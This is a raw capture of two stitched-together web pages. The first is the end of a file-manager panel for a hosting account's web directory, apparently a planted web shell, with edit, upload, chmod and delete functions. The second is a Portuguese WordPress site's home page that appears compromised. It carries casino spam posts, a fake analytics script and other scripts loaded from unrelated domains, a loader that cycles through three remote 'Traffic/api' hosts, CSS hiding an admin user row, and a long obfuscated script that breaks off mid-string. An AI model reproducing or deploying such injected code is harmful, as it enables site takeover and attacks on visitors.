                            <td><a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="file-link">📄 xmlrpc.php</a></td>
                            <td class="size">3.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-08 18:52</td>
                            <td><div class="actions">
                                <a href="?p=%2Fhome2%2Fpablod78%2Fpublic_html&edit=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fhome2%2Fpablod78%2Fpublic_html%2Fxmlrpc.php" class="action-button">Download</a>
                                <button onclick="showRename('/home2/pablod78/public_html/xmlrpc.php','xmlrpc.php')" class="action-button">Rename</button>
                                <button onclick="showChmod('/home2/pablod78/public_html/xmlrpc.php','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/home2/pablod78/public_html/xmlrpc.php',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                        </tbody>
            </table>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/home2/pablod78/public_html';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//glustrioenbrisk.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6ab13f5df20e9*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://glustrioenbrisk.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog wp-embed-responsive wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio" aria-current="page">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos" aria-current="page">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao" aria-current="page">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao" aria-current="page">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais" aria-current="page">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato" aria-current="page">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/07/resources-online-casino-magyar/">Resources: online casino magyar</a></h2><p>More details available at online casino magyar.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/it-does-not-have-a-narrative-otherwise-characters-however-pulls-of-a-lot-to-own-its-ease-and-you-may-profitable-perks/">It does not have a narrative otherwise characters however, pulls of a lot to own its ease and you may profitable perks</a></h2><p>I adore that there surely is a good amount of a method to gather totally free coins on a daily basis Of several members like video clips harbors because of their incentive series You&#8217;ll find them in almost any form of slots, however, they are most common in the video ports with quite a few [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/before-you-can-dive-on-the-to-try-out-it-is-essential-to-understand-the-regulations-linked-to-per-offer/">Before you can dive on the to try out, it is essential to understand the regulations linked to per offer</a></h2><p>Additionally, this one boasts an even higher winning prospective, capping your wins during the an astonishing 10,000x their bet. Prolific providers like Calm down Gaming and you may Hacksaw Gaming usually discharge casino games that will home you actual honors each week, to your finest sweeps casinos quickly including these to the library. Volatility is [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/to-have-members-that-have-ordered-gold-coins-a-real-time-cam-feature-is-available-for-shorter-solutions/">To have members that have ordered Gold coins, a real time cam feature is available for shorter solutions</a></h2><p>There are several sweepstakes gambling enterprises which might be reduced, particularly Top Gold coins Casino, however, Super Bonanza is just one of the better options for quick South carolina winnings. This really is an elementary desired added bonus over the business, as numerous most other prominent sweepstakes gambling enterprises particularly McLuck have a similar render. [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/another-display-screen-can-look-and-you-can-choose-from-a-range-of-fish-dining-containers/">Another display screen can look, and you can choose from a range of fish dining containers</a></h2><p>Whenever in a position, hit the tangerine twist option for the screen&#8217;s base to spin the brand new reels Since participants end in they, he could be gone to live in a second display screen where they are able to choose Seafood Restaurants. This is imperative to understand if you would like browse the contours [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/as-opposed-to-og-slot-classics-with-horizontal-paylines-these-paylines-are-often-straight-diagonal-or-even-zigzag/">As opposed to OG slot classics with horizontal paylines, these paylines are often straight, diagonal, or even zigzag</a></h2><p>Because they usually do not commonly pay that frequently, some titles do have potentially larger profits While looking for someplace to tackle higher RTP ports, your choice of online casinos may be a lot more minimal. Yet not, these are generally nowhere close 7Signs since the preferred since the ports that have go back to [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/having-fun-with-bitcoin-or-some-other-cryptocurrency-for-your-dumps-opens-up-another-coating-of-professionals/">Having fun with Bitcoin or some other cryptocurrency for your dumps opens up another coating of professionals</a></h2><p>This is not a-one-big date handshake; it is a continual boost designed to optimize your first courses These types of no-deposit offers is your chance to relax and play actual-currency gamble and Kaiser Slots online casino score wins towards house. Make use of the code 15FREELS in order to immediately discover a good $15 borrowing [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/luckyland-harbors-are-a-major-personal-experiment-run-from-the-vgw-luckyland-inc/">LuckyLand Harbors are a major personal experiment, run from the VGW Luckyland Inc</a></h2><p>in the wide world of web based casinos who&#8217;s got quickly gained popularity among the many society of one&#8217;s All of us. You can check out the incentives and take advantage of its good welcome render. Carefully believe if or not doing forecast markets is appropriate to you personally, according to your debts and you [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/totally-free-ports-have-fun-with-virtual-coins-and-do-not-provide-real-cash-honours/">Totally free ports have fun with virtual coins and do not provide real cash honours</a></h2><p>The brand new invited-incentive rollover and you can offshore dispute station are the head change-offs Once i attempt to visit, I&#8217;m told which i have the older version also to upgrade. I do not including the design games of the many but many thanks for expenses alots of your time written this game . It&#8217;s [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/ranging-from-bob-and-leaders-here-that-is-one100-for-the-wins-alone/">Ranging from Bob and Leaders here, that is $one,100 for the wins alone!</a></h2><p>This is exactly why you will not ?nd denominations busted call at many urban centers-like Nj, in which regulators averted reporting independent denominations nine years ago. In advance of we get into the champions, i constantly need to provide answers to one particular-faqs regarding the report. Participants not only in gambling enterprises however, the individuals [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/09/21/the-brand-new-reduce-machines-during-the-a-gambling-establishment-are-the-ones-hosts-that-have-the-greatest-paybacks/">The brand new reduce machines during the a gambling establishment are the ones hosts that have the greatest paybacks</a></h2><p>They demonstrate that there are still casinos one to o?er highest output to your position ?oor Casinos set loose hosts close to the entry, including, so passersby can see people effective and they are seduced to get in the newest local casino and attempt their luck. Before we could find out where in fact the [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/2/" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
<script>
"use strict";var ZdUoeuy,M2dk7L,rqxoVlg,sbOEwKZ,jlERBH,eYexe1,JRDuxB,m3pKaT,BwdvBA;const WFFnGD4=[0x0,0x1,0x8,0xff,"length","undefined",0x3f,0x6,"fromCodePoint",0x7,0xc,"push",0x5b,0x1fff,0x58,0xd,0xe,0x7f,0x80,0x3c,0x83,0x8c,"js",0xa3,0x3];function np0QHN8(ZdUoeuy){var M2dk7L="95#+3*%^7y.<){EV`f}RFLxG[>?wB(,I!tU:8vd]\"T2Auil0k4H;$6qjeCWMDpoPJ&O/mKXaSzcZhbrgY~n1=Q|_s@N",rqxoVlg,sbOEwKZ,jlERBH,eYexe1,JRDuxB,m3pKaT,BwdvBA;MoGAdn(rqxoVlg=""+(ZdUoeuy||""),sbOEwKZ=rqxoVlg.length,jlERBH=[],eYexe1=WFFnGD4[0x0],JRDuxB=WFFnGD4[0x0],m3pKaT=-WFFnGD4[0x1]);for(BwdvBA=WFFnGD4[0x0];BwdvBA<sbOEwKZ;BwdvBA++){var np0QHN8=M2dk7L.indexOf(rqxoVlg[BwdvBA]);if(np0QHN8===-WFFnGD4[0x1])continue;if(m3pKaT<WFFnGD4[0x0]){m3pKaT=np0QHN8}else{MoGAdn(m3pKaT+=np0QHN8*WFFnGD4[0xc],eYexe1|=m3pKaT<<JRDuxB,JRDuxB+=(m3pKaT&WFFnGD4[0xd])>WFFnGD4[0xe]?WFFnGD4[0xf]:WFFnGD4[0x10]);do{MoGAdn(jlERBH.push(eYexe1&WFFnGD4[0x3]),eYexe1>>=WFFnGD4[0x2],JRDuxB-=WFFnGD4[0x2])}while(JRDuxB>WFFnGD4[0x9]);m3pKaT=-WFFnGD4[0x1]}}if(m3pKaT>-WFFnGD4[0x1]){jlERBH.push((eYexe1|m3pKaT<<JRDuxB)&WFFnGD4[0x3])}return UvHSzJ(jlERBH)}function z1QctwX(rqxoVlg){if(typeof ZdUoeuy[rqxoVlg]===WFFnGD4[0x5]){return ZdUoeuy[rqxoVlg]=np0QHN8(M2dk7L[rqxoVlg])}return ZdUoeuy[rqxoVlg]}MoGAdn(ZdUoeuy={},M2dk7L=["BqXhxHj5","*CDbp]8#yWvg!1#[d;Q^#SQ:,OOY\"S.?&z3(4Z`8A7!gb>)R94oj$v9","vGZ*|h1{CFpb+a|TV45wPDV5I)","r%pI*c[,X{}K9]k\"wm%y!rI0nRE,In}BCodh2zh}mCEZ5","*(H;,aX%ELM^k+","rfub4mvRuLU+3+bdtk|I2eZC4}<,@8.","res49jGK4V[.BwM2ro]45g65io64S+%","ZM.(cD<6LW6BK39GMkDb^U{^c<","cfX$=K6GaW$","pfN;%D4:%J<w1#","<c/(P=q\"+quoC[2>IDH!pSH#5}9m{kqB(qk%:z/GTEC>%pkwG!#","[ld3dn_gK{qh8+oGzG;7<CU,VV~}<ETIAI4%y|CTzF","!kYq[ay{FCU","GFM(SD<ZnDyq:??The4S*SG^[{r6]#",":%K.%SDm#qbb@3LBtmly9|2)`)SP(3(:~MV$/gE#,PK4BaC:PkLh{~y>@F","5AEI>M%,]{P3.vz].3P4cKG5nR]Bp3V",")3A!kPs)[Fkf^n$w!;2b_0{TfV:Ks1M28y#;rk~{(}|~24=\"T)jhzo9","~;,j9g*T^","/mjh$vr%bEqB^d<]5CwSolZPw&We{DofX9","1M9,M]aTGFuMo{NB:m#Z\"mDYwf~lK[U,","<A<bw:W[[fY8!+&,QX{Irda{SWJ7c~P2","8;k%3o371q{ZP+w2yC+SEdi{%.tUDV,:!%\"%$XS|r}Lgln]vzi+.","/;$6.d`$^JnP+dy]H\"8cyoAC@FiLySFUPo&7","3PIyco,|gVRvX~yRg<ayH4MQ>&@!>36\"3V?!bkH\"MEDYG#","*:;6QQ]^2o?%.*;\"((04IzX}7FVjD+&}?lxz1dVTFR|cz4`?G!F.bh}[sf%F5","|UJqog#X[FjX2n|T`%E^f1H,TE","wymc_hq\"4)=xD+","+qi.$b&5EV9Ss+xTUUf;>MM{EVtwZE;\"XFO!ZC_K0V","d(y,ta?8xRP3/nGTRV_z<dy6=qezVV4\"K+]3Qa9","rm!;GHUc/yQcG#p:nMx$.HVT\"F&:]Xp(eFGht:ElqWb>5","l;:!_dql%jHE5","t%pcdQ%}{}AkfS/>C&>ZSj*_?FXY3`.F@]syLQJm/R?f5","I+D6nK.Wie[o2{FU+:XIke[7=COEw#@`QX;b,rkWJV&LPWu?mv6^&l>RwE","BlLj}1+>BfUK?*f?BFqhq=~^8qR;Up%vX;ry","<4[zy|mm4PqzadDG:A5,9l~::)","6yghtp@:1CRIx~q\"G\"j3nrgT4qUo)Vt8oz3.r8a(wMb}5","&ooz6Wd,V)&z.*N8y(R(RaS,ZMT[*=uR]+6^=oXl1J7Z8Sz>NM04&6[#","R(Bbj=$#wo2L.~@:","WFS%:MB$8RqPkwmIri#",";&TqJW}$@E%U3V92+4&7Ia!,Me#Sp>y}z2G4QhcW~V?{{=G:","Oo,I*K{>@f%{+X3ItV>w_r:ZwMizOX+Ao&+","av[rogH,;yRSFDfF`Dn*04pKKRWb^n/va2]hqn9","qGeyxKC(kLkKZ+U8KoHSkeTC0LRZhkL:ni4%SUl)tVabBkIfbU_B+~D#","gEJ4triKmqhe80FBXq_zFh)|dJe$@D{","gE|hD=!,D6iKQkCTkq_hk=\"}a{<kK3V","yl*$CD]R5V,KaV,,$&x^6Z5T9VFn$+Of4;H!#kqYi<<Sk`]duAjh!r>KqWb45","~M+c$v$m>fukk1|xr<]ypka(r<w+kVXRa9","6)GzTpQ:N<I.N4Yw<a?wLhi:;D6Y@Y\"R.AK?Gh5:X{T$q47}6%a4F1/Z%","So+cfo?,QWk3G#Qx?lX4Bae#","zv;S1K+KOqF%$1k]2f*cXjQT^{p^W~@(1kEjZ~9","}%EjknNc;C(f3aLB=&L3ajc,SFJ>]?)>%CW6=KM{*J2f^?%","1B};/lZT\"{WLN>E?)lmHVh3,qWs/S[:fi%9,OS>~IL9GR#=x","*PRSXj4:+",")a[,BM.7hoNHX~?2ECn*c~y~/CKX2{J2V4Kjs1{5X{$","P+.ZV1%$Nf]haX^v\"))b?dl\"nPclq>o:^(|^>dxJ!}4","2C6cxKJlD&7&e1<?df&;4;|UBEg85","xa5%.~KCP6az&>>TXo5qF","xG2;c~98PeHKf*3AFVH!2psY,OXP*SPfz;P3G$L:aJT.]Wv[f;_3ve9","poO7{hk,^","@kN6YoW#UR\"+^dB:4k;6_$r%re(IhwC:cEoh+o^6io*G&SjT4%eq[","eo)c.Ht(9PuhBa:IJBlj<dPT=JRKWn}BYe9rv\"`J|J^yy`!8qmjB{","uc3.;l!J8ql^X>qBtAX$,pN)eW>fW4|`Ooa4EomlzW>[X{D8Iy`ys04^(}","dk9tFh~;$J5SadVwD&BIShcUPV>o=M^I+C\"yGrJm>&N~:X=wlvVy>z/CxJq","ck,jWSPCDo6:z3[U2&!ywqM:DMD!l4ZRdmv.J8b(}VmMr~U,","9Lf;8:&(Cf>{CkXvy5","BFx$>1>0^{ikB+q\"","VaBbBQq#","Km0$(p|$&Dsxg?|B7c~;xa6TtyZ3yk:IB?>wAY77=C1x~k9[=B\"zqX&{rP!","^3)b%gd,~};","citqT:,)HV0z+a+ArB8cX8t0YP1/z8C(LVH!E","qy|^3jV^h<JlME4wb;l^MW=l(M}wU*,[g9","LmXjgjV5","~&,B`aWmp<&Mo>=\"Qz`t[H&Gz&LvQ[~\">!Bc}dKC/ROM\"MFB","pB&%R~L0$J8$e1_xr;b^7jecTfRk!azR2\"9y:Y]C^","|>;bfoO)$JK!XK/,y4]3FKm%D67S$+a}z%]hrCjGWo%05","7lp^1~=\"!DBgoXD,KikqFMS}yFpeB+","`;Q$vzP5","4;O;:Z^R;J=PW4